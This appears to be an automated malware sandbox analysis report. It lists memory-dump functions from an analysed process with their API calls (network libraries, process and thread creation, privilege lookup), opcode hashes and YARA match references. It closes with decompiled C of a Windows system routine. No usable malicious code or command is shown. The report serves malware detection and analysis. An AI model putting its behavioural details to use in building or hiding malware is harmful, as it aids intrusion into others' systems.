Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 008DFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFAC3

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 008DFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFADB

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 008DFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFAF3

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 008DFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFBC3

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 008DFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFB5B

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 008DFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFB73

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 008DFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFC6B

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 008DFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFD9A

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 008DFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFDCB

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 008DFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFEDB

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 008DFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DFFBF

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00096EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F98

Strings

net.dll, xrefs: 00096F61, 00096FE7, 00096FBF, 00096FCB, 00096FF3
wininet.dll, xrefs: 00096F4E, 00096F57

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 73571eff084cb8e0798b2c0eab26c399e796892b25b6c18de53388f34d92978b
Instruction ID: 7d8b1d8ba28866602b20d3b177eda96cb5cfdb2d66ab4d1c43b4747a890dc9c6
Opcode Fuzzy Hash: 73571eff084cb8e0798b2c0eab26c399e796892b25b6c18de53388f34d92978b
Instruction Fuzzy Hash: 983181B2601304ABCB21DF68D8A1FA7B7F8BB88700F00842DF61A5B241D730B545DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098469, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&5,?,00093C9F,00093C9F,?,00093526,?,?,?,?,?,00000000,00000000,?), ref: 000984CD

Strings

&5, xrefs: 000984C2, 000984CC

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5
API String ID: 1279760036-409770322
Opcode ID: 71dcf8818253ede2bfbff33ceec4b9c0bab6ecc6588223c3be969c2677b13b99
Instruction ID: 703f4b18ee900061d40c4b2742332622f501a75b184d11e899ac84f32affdc4a
Opcode Fuzzy Hash: 71dcf8818253ede2bfbff33ceec4b9c0bab6ecc6588223c3be969c2677b13b99
Instruction Fuzzy Hash: 19018F75200204AFDB14DF64CC85EE77B68EF94760F108599F9499B382C671E900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000984D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009850D

Strings

.z`, xrefs: 000984FC, 00098508

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: c76ca82639f7ef74add5ce11bcb305daa700df7094357dff83c39d313f5036f1
Instruction ID: 0c6a97829ba27112689cbf75ae58ede3c1be220b5d092622039fafdb7f03d3ec
Opcode Fuzzy Hash: c76ca82639f7ef74add5ce11bcb305daa700df7094357dff83c39d313f5036f1
Instruction Fuzzy Hash: F5F06DB26102046FDB18EF64CC45EE77B68EF84754F014699F918AB392D631EA14CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 000984A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(&5,?,00093C9F,00093C9F,?,00093526,?,?,?,?,?,00000000,00000000,?), ref: 000984CD

Strings

&5, xrefs: 000984C2, 000984CC

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5
API String ID: 1279760036-409770322
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 6c0df915bea2caa36fd6f015e2c09beeb15b00678bc36b369e12ab64941e322a
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 2CE012B1200208ABDB14EF99CC41EA777ACAF88650F118558BA089B282CA30F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 000984E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009850D

Strings

.z`, xrefs: 000984FC, 00098508

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: bcf903c7991c295c04e1ffd94516c1785eeebb9a2bad9424d7e0369f9934967b
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 91E01AB12002086BDB14DF59CC45EA777ACAF88750F018554B90857282C630E910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00087270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872EB

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b1f2331b0810d28ac44f054cd9b83341ef49fb6fc314549f8dff0e5c73b95d59
Instruction ID: 890b9536173f0d1ac96ba421bf0af5f3428debe7a451986ede6eb0716dff7d3d
Opcode Fuzzy Hash: b1f2331b0810d28ac44f054cd9b83341ef49fb6fc314549f8dff0e5c73b95d59
Instruction Fuzzy Hash: 3601A232A8022877EB20B6949C43FFE776C6B00B51F150118FF44BA1C2E694AA0687F6

Uniqueness

Uniqueness Score: -1.00%

Function 00089B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BA2

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 5ac55fa03450ebc64b1ba5b4960ba0ef4bdd9fbf4f82a0388a50bac58c5ba662
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BE0100B5E0010DABDF10EAE4ED42FDDB7B8AB54308F044195A91997142F671EB14D791

Uniqueness

Uniqueness Score: -1.00%

Function 00098550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000985A4

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: a75b1cc5d5cdda9bd078e5c52ba7b154e600acc1af2e2c97a8f66359dc0dc13e
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: E801AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00097020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009705C

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5670447c734d626b77e30e202337d5e73e6b02cff39b60b41192f5a46965ff24
Instruction ID: b11d4e9ee063865f172f5d27fd15d676f48a1d75906f88214a6af1d8dd413c07
Opcode Fuzzy Hash: 5670447c734d626b77e30e202337d5e73e6b02cff39b60b41192f5a46965ff24
Instruction Fuzzy Hash: 33E06D333902043AE7306599AC02FE7B39C8B81B20F140026FA0DEA2C2D595F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00098640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098670

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: ba115d3dc9753696b117ea0f5378861b5dd38b33d8e5faebc7740d5019f6ccb2
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: F2E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857282C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008D418, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C73,?), ref: 0008D44B

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: bfce5bfd4a69a65d539384809278310cc0b59fc9de76c039592a46dc021ffdee
Instruction ID: a1f17f8ba593d9de6a22a7b196021b7c47f5ae3feefb6cbf96a9e61db3c33727
Opcode Fuzzy Hash: bfce5bfd4a69a65d539384809278310cc0b59fc9de76c039592a46dc021ffdee
Instruction Fuzzy Hash: 9DE0C2757503042BE610FBB48C46F6533C96B45B10F0840A8F948D73C3EA64E9008A51

Uniqueness

Uniqueness Score: -1.00%

Function 0008D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C73,?), ref: 0008D44B

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 5ee596a1bfbfaa077a92055b3d8a9dc3091a8f25d82d4e0fe3606be2394aea5d
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 8AD0A7717503043BEA10FAA49C07F6673CD6B44B00F494074F948D73C3D964F9004565

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00908788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00908788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00908460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008EE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0090718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
